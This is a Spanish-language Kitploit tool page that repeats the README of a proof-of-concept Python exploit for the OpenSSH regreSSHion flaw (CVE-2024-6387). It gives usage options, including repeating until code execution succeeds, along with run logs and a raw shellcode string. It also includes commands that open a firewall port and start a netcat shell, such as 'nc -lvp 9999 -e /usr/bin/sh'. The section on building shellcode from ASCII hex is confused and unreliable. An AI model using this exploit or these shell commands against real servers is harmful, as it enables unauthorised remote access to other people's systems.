Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-6387 — Script de Python de prueba de concepto para el exploit regreSSHion. | Kitploit
Herramientas/GitHubGitHub/l-urk/cve-2024-6387
Análisis de VulnerabilidadesExplotaciónShellcodeSeguridad de RedesPruebas de PenetraciónHerramienta de Acceso RemotoGeneración de ShellcodeDesarrollo de PayloadsExplotación de Binarios
GitHubl-urk/cve-2024-6387

CVE-2024-6387

Script de Python de prueba de concepto para el exploit regreSSHion.

125hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2024-6387 regreSSHion

Script de Python de prueba de concepto para el exploit regreSSHion. Versión 0.2.1 build POC regreSSHion-green-banner

Instalación

root@kitploit:~
git clone https://github.com/l-urk/CVE-2024-6387.git
root@kitploit:~
cd CVE-2024-6387
root@kitploit:~
pip3 install -r requirements.txt
root@kitploit:~
python3 regreSSHion.py -h

Uso

root@kitploit:~
🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

usage: regreSSHion.py [-h] -i IP -p PORT [-t] [-c] [-d] [-r] [-x] [-y] [-z]

🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target SSH server IPv4 ( format: -i 0.0.0.0 )
  -p PORT, --port PORT  target SSH server port number ( format: -p 22 )
  -t, --time            ENABLE TIME displayed on all log output ( format: -t )
  -c, --clear           CLEAR SCREEN before running the exploit ( format: -c )
  -d, --debug           enable see the DEBUG LOGS output on run ( format: -d )
  -r, --repeat          enable to REPEAT EXPLOIT until RCE wins ( format: -r )
  -x, --skipssh         enable this to SKIP SSH HANDSHAKES ( format: -x )
  -y, --skipheap        enable this to SKIP HEAP and parse ( format: -y )
  -z, --skipfinal       enable this to SKIP FINAL ID CHECK ( format: -z )

🔒 Affected OpenSSH Versions: 1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8

🔒 contact: github.com/l-urk - x.com/l_urkk

Para usar el script, inicia python3 con regreSSHion.py

  • Establece la IP a la dirección IPv4 del servidor SSH vulnerable
  • Establece el puerto al número de puerto del servidor SSH vulnerable
root@kitploit:~
python3 regreSSHion.py --ip 127.0.0.1 --port 22
root@kitploit:~
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4

Supongamos que consigues llegar hasta este punto en el script...

root@kitploit:~
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.

Si dice que la verificación del exploit fue exitosa, has entregado y ejecutado tu payload correctamente. El script intentará varias veces hasta lograrlo. Te sugiero probar esto en tu propio servidor SSH vulnerable hasta que te hagas una idea de cómo obtener el mensaje de éxito.

root@kitploit:~
2024-08-03 22:47:15,891 - ERROR - Exploitation failed.

Modo depuración

  • Con el modo de depuración habilitado obtendrás una salida más detallada; esto te mostrará la cadena de versión SSH recibida, la información de longitud de paquete y algunas otras cosas, prácticamente todo lo que ocurre y que podría ser registrado.
root@kitploit:~
python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug

Ejemplo de salida:

root@kitploit:~
2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...

payload de shellcode

El shellcode predeterminado usa ufw para abrir el puerto entrante 9999 e inicia un shell en escucha con nc en el puerto 9999

root@kitploit:~
    shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

creación del payload de shellcode

Puedes crear tu propio payload de shellcode usando un editor de ascii a hexadecimal y convirtiéndolo manualmente a shellcode. Yo uso este sitio web de ascii a hex: https://www.rapidtables.com/convert/number/ascii-to-hex.html

  • Ingresa el texto deseado para el shellcode.
  • Usa la configuración "User defined" y "\x" en el cuadro de entrada.
  • Reemplaza todas las X mayúsculas por x minúsculas
  • Usa el Bloc de notas u otro programa capaz de reemplazar caracteres.
  • Mueve el último \x del final al inicio de la cadena hexadecimal.
  • Añade comillas en ambos extremos para que el shell lo interprete.

ejemplos de payload de shellcode

hello world

root@kitploit:~
hello world
root@kitploit:~
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

printf hello world

root@kitploit:~
printf hello world
root@kitploit:~
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

crear archivo de prueba

root@kitploit:~
test > test
root@kitploit:~
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"

Permitir conexiones entrantes en el puerto 9999 y abrir un shell nc en el puerto 9999

root@kitploit:~
ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh
root@kitploit:~
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"

send_socket.py

Si quieres probar la ejecución de un payload de shellcode, puedes usar el script send_socket.py. Uso:

root@kitploit:~
usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]

send shellcode to a target socket (ip and port)

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target ip address (default: 127.0.0.1)
  -p PORT, --port PORT  target tcp socket port (default: 1111)
  -s SHELLCODE, --shellcode SHELLCODE
                        shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)

Emisor:

root@kitploit:~
python3 send_socket.py -i 127.0.0.1 -p 1111

Receptor:

  • interpretación de texto sin formato
root@kitploit:~
nc -lvp 1111
  • ejecución de shell
root@kitploit:~
nc -lvp 1111 -e /usr/bin/bash
Descargar herramienta